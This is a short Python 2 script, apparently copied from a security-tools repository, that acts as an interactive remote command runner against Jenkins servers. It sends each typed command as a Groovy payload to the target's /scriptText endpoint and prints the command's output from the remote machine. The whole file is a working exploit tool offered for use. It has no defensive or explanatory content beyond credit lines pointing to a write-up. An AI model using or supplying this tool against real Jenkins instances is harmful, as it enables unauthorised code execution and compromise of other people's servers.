30 lines
810 B
Python
30 lines
810 B
Python
|
#!/usr/bin/env python
|
||
|
# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
|
||
|
# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
|
||
|
import requests
|
||
|
import sys
|
||
|
|
||
|
print """
|
||
|
Jenkins Groovy Console cmd runner.
|
||
|
|
||
|
usage: ./jgc.py [HOST]
|
||
|
|
||
|
Then type any command and wait for STDOUT output from remote machine.
|
||
|
Type 'exit' to exit :)
|
||
|
"""
|
||
|
URL = sys.argv[1] + '/scriptText'
|
||
|
HEADERS = {
|
||
|
'User-Agent': 'jgc'
|
||
|
}
|
||
|
|
||
|
while 1:
|
||
|
CMD = raw_input(">> Enter command to execute (or type 'exit' to exit): ")
|
||
|
if CMD == 'exit':
|
||
|
print "exiting...\n"
|
||
|
exit(0)
|
||
|
|
||
|
DATA = {
|
||
|
'script': 'println "{}".execute().text'.format(CMD)
|
||
|
}
|
||
|
result = requests.post(URL, headers=HEADERS, data=DATA)
|
||
|
print result.text
|